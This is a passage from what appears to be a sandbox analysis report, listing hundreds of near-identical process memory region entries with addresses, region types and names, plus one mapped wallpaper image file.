= 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4158 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4159 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4160 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4161 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4162 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4163 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4164 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4167 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4168 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4169 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4170 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4175 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4176 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4177 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4178 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4179 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4180 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4181 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4182 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4185 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4186 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4187 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4188 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4190 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4191 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4192 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4193 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4194 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4195 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4196 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4197 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4198 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4199 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4200 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4201 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4202 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4203 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4204 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4205 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4206 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4207 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4208 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4209 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4210 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4211 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4212 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4213 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4214 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4215 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4216 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4217 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4218 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4219 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4220 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4221 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4222 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4223 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4224 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4225 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4226 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4227 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4228 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4229 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4230 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4231 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4232 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4233 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4234 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4235 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4236 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4237 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4238 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4239 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4240 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4241 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4242 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4243 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4244 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4245 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4246 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4247 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4248 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4249 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4250 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4251 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4252 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4253 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4254 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4255 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4256 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4257 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4258 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4259 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4260 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4261 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4262 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4263 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4264 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4265 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4266 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4267 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4268 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4269 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4270 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4271 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4272 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4273 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4274 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4275 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4276 start_va = 0x3cf0000 end_va = 0x3d27fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 4277 start_va = 0x9870000 end_va = 0x9d61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009870000" filename = "" Region: id = 4278 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4279 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4280 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4281 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4282 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4283 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4284 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4285 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4286 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4287 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4288 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4289 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4290 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4291 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4292 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4293 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4294 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4295 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4296 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4297 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4298 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4299 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4300 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4301 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4302 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4303 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4304 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4305 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4306 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4307 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4308 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4309 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4310 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4311 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4312 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4313 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4314 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4315 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4316 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4317 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4318 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4319 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4320 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4321 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4322 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4323 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4324 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4325 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4326 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4327 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4328 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4329 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4331 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4332 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4333 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4334 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4335 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4336 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4337 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4338 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4339 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4340 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4341 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4342 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4343 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4344 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4345 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4346 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4347 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4348 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4349 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4350 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4351 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4352 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4353 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4354 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4355 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4356 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4357 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4358 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4359 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4360 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 4361 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4362 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 4363 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4364 start_va = 0x2360000 end_va 